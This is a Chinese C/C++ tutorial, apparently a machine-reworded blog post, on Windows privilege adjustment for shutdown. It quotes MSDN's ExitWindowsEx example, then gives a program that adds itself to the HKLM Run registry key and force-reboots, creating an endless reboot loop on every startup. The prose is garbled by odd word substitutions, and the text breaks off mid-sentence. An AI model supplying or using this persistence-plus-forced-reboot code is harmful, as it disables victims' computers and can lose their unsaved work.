C/C++无穷关机(提权例子)【C#.Net教程】,C/C++，无限关机

在windows体系中，当触及本历程去操纵其他历程，或许要用shutdown这些高危敕令的时刻就触及提权，下面是MSDN的列子

提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges

我们用下面这个MSDN的代码来做一个注册表无穷关机的列子

#include <windows.h>  
  
#pragma comment(lib, "user32.lib")  
#pragma comment(lib, "advapi32.lib")  
  
BOOL MySystemShutdown()  
{  
   HANDLE hToken;   
   TOKEN_PRIVILEGES tkp;   
   
   // Get a token for this process.   
   
   if (!OpenProcessToken(GetCurrentProcess(),   
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))   
      return( FALSE );   
   
   // Get the LUID for the shutdown privilege.   
   
   LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,   
        &tkp.Privileges[0].Luid);   
   
   tkp.PrivilegeCount = 1;  // one privilege to set      
   tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;   
   
   // Get the shutdown privilege for this process.   
   
   AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,   
        (PTOKEN_PRIVILEGES)NULL, 0);   
   
   if (GetLastError() != ERROR_SUCCESS)   
      return FALSE;   
   
   // Shut down the system and force all applications to close.   
   
   if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,   
               SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
               SHTDN_REASON_MINOR_UPGRADE |  
               SHTDN_REASON_FLAG_PLANNED))   
      return FALSE;   
  
   //shutdown was successful  
   return TRUE;  
}

上面是MSDN的代码，下面给出无穷关机的代码(含细致解释)

// shutdownDemo.cpp : 定义控制台应用程序的进口点。  
//  
  
#include "stdafx.h"  
#include <windows.h>  
  
BOOL MySystemShutdown()  
{  
    HANDLE hToken;      //用于操纵的句柄  
    TOKEN_PRIVILEGES tkp;   //用于寄存特定信息  
  
    // Get a token for this process.   
  
    if (!OpenProcessToken(GetCurrentProcess(),  
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))  
        return(FALSE);  
  
    // Get the LUID for the shutdown privilege.   
    //假如要提权的话要在下面这两个函数提权  
  
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,  
        &tkp.Privileges[0].Luid);  
  
    tkp.PrivilegeCount = 1;  // one privilege to set      
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
  
    // Get the shutdown privilege for this process.       
  
  
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,  
        (PTOKEN_PRIVILEGES)NULL, 0);  
  
    if (GetLastError() != ERROR_SUCCESS)  
        return FALSE;  
  
    // Shut down the system and force all applications to close.   
  
    if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,  
        SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
        SHTDN_REASON_MINOR_UPGRADE |  
        SHTDN_REASON_FLAG_PLANNED))  
        return FALSE;  
  
    //shutdown was successful  
    return TRUE;  
}  
  
  
int _tmain(int argc, _TCHAR* argv[])  
{  
    getchar();  
    HKEY hKey = { 0 };  
  
    /*LONG RegOpenKeyEx( 
        HKEY hKey, // 须要翻开的主键的称号 
        LPCTSTR lpSubKey, //须要翻开的子键的称号 
        DWORD ulOptions, // 保存，设为0 
        REGSAM samDesired, // 平安接见标记，也就是权限 
        PHKEY phkResult // 获得的将要翻开键的句柄 
        )*/  
  
    RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey);    //翻开一个指定的注册表键  
    char path[MAX_PATH] = { 0 };  
    GetModuleFileNameA(nullptr, path, MAX_PATH);    //猎取当前文件途径  
  
    RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));  
    MySystemShutdown();  
    return 0;  
}

假如涌现下面题目